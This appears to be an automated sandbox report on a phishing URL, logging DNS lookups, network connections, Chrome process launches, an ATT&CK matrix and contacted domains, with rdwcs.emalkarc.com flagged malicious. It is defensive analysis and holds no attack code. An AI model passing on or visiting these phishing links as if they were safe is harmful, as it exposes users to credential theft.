Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: formgrind-my.sharepoint.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: eastus1-mediap.svc.ms
Source: global traffic	DNS traffic detected: DNS query: spo.nel.measure.office.net
Source: global traffic	DNS traffic detected: DNS query: rdwcs.emalkarc.com
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: 8105.vrt7119.ru
Source: global traffic	DNS traffic detected: DNS query: cdn.socket.io
Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: objects.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: ipapi.co
Source: global traffic	DNS traffic detected: DNS query: bvtjo.logentr.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: m365cdn.nel.measure.office.net

Source: unknown	Network traffic detected: HTTP traffic on port 60741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61070
Source: unknown	Network traffic detected: HTTP traffic on port 60690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60653
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60773
Source: unknown	Network traffic detected: HTTP traffic on port 61070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60770
Source: unknown	Network traffic detected: HTTP traffic on port 60735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60626 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61067
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60654
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60775
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60664
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60663
Source: unknown	Network traffic detected: HTTP traffic on port 61018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60644 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60782
Source: unknown	Network traffic detected: HTTP traffic on port 60862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60660
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60781
Source: unknown	Network traffic detected: HTTP traffic on port 60701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60780
Source: unknown	Network traffic detected: HTTP traffic on port 60971 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60668
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60666
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 60753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 60988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60795
Source: unknown	Network traffic detected: HTTP traffic on port 60672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60672
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60671
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60792
Source: unknown	Network traffic detected: HTTP traffic on port 60666 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60790
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60643 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60676
Source: unknown	Network traffic detected: HTTP traffic on port 60683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60683
Source: unknown	Network traffic detected: HTTP traffic on port 60994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 60793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60687
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60618
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60739
Source: unknown	Network traffic detected: HTTP traffic on port 61002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60970
Source: unknown	Network traffic detected: HTTP traffic on port 60697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61026
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60973
Source: unknown	Network traffic detected: HTTP traffic on port 60742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60660 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60654 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60620
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60981
Source: unknown	Network traffic detected: HTTP traffic on port 60671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60627
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60626
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60988
Source: unknown	Network traffic detected: HTTP traffic on port 60757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60984
Source: unknown	Network traffic detected: HTTP traffic on port 61014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60653 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60990
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60635
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60634
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60755
Source: unknown	Network traffic detected: HTTP traffic on port 60775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60997
Source: unknown	Network traffic detected: HTTP traffic on port 60620 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60874
Source: unknown	Network traffic detected: HTTP traffic on port 60874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60642
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60641
Source: unknown	Network traffic detected: HTTP traffic on port 60967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60760
Source: unknown	Network traffic detected: HTTP traffic on port 60973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60646
Source: unknown	Network traffic detected: HTTP traffic on port 60642 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60644
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60765
Source: unknown	Network traffic detected: HTTP traffic on port 60868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60643
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60816
Source: unknown	Network traffic detected: HTTP traffic on port 61021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60664 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60641 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60701
Source: unknown	Network traffic detected: HTTP traffic on port 61010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60839
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61006
Source: unknown	Network traffic detected: HTTP traffic on port 60779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60836
Source: unknown	Network traffic detected: HTTP traffic on port 60842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61001
Source: unknown	Network traffic detected: HTTP traffic on port 60756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61002
Source: unknown	Network traffic detected: HTTP traffic on port 60997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61004
Source: unknown	Network traffic detected: HTTP traffic on port 60869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61005
Source: unknown	Network traffic detected: HTTP traffic on port 60635 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60618 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61018
Source: unknown	Network traffic detected: HTTP traffic on port 60646 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60969
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61010
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61011
Source: unknown	Network traffic detected: HTTP traffic on port 60663 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61012
Source: unknown	Network traffic detected: HTTP traffic on port 60751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61015
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61016
Source: unknown	Network traffic detected: HTTP traffic on port 60760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60697
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60694
Source: unknown	Network traffic detected: HTTP traffic on port 60777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60692
Source: unknown	Network traffic detected: HTTP traffic on port 60668 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60690
Source: unknown	Network traffic detected: HTTP traffic on port 61011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60627 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60634 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60803
Source: unknown	Network traffic detected: HTTP traffic on port 60998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60800
Source: unknown	Network traffic detected: HTTP traffic on port 61016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60738 -> 443

Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:60654 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:60697 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:60701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:60816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.159.23:443 -> 192.168.2.17:60831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:60833 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.209.182:443 -> 192.168.2.17:60836 version: TLS 1.2

Source: classification engine

Classification label: mal72.phis.win@28/342@66/321

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google\Chrome\Application\Dictionaries

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://formgrind-my.sharepoint.com/:i:/p/laurence/EQidvWga5z5AkLSZaC8mcgQB5SsWp0hmDAXJ2zBQZCdtYg?e=Awsuih
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1964,i,5944536068702566294,9145615382994554706,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1964,i,5944536068702566294,9145615382994554706,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://rdwcs.emalkarc.com/KsmxUZnO/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2016,i,5536660013962346328,15030357733291837705,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2016,i,5536660013962346328,15030357733291837705,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	1 Process Injection	3 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://formgrind-my.sharepoint.com/:i:/p/laurence/EQidvWga5z5AkLSZaC8mcgQB5SsWp0hmDAXJ2zBQZCdtYg?e=Awsuih	0%	Avira URL Cloud	safe

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
dual-spo-0005.spo-msedge.net	13.107.136.10	true	false	unknown
a.nel.cloudflare.com	35.190.80.1	true	false	unknown
github.com	140.82.121.3	true	false	unknown
8105.vrt7119.ru	104.21.79.87	true	false	unknown
ipapi.co	104.26.8.44	true	false	unknown
code.jquery.com	151.101.2.137	true	false	unknown
d2vgu95hoyrpkh.cloudfront.net	13.227.219.40	true	false	unknown
cdnjs.cloudflare.com	104.17.25.14	true	false	unknown
challenges.cloudflare.com	104.17.3.184	true	false	unknown
www.google.com	142.250.186.132	true	false	unknown
bvtjo.logentr.com	188.114.97.3	true	false	unknown
rdwcs.emalkarc.com	188.114.97.3	true	true	unknown
objects.githubusercontent.com	185.199.110.133	true	false	unknown
httpbin.org	44.212.150.222	true	false	unknown
formgrind-my.sharepoint.com	unknown	unknown	false	unknown
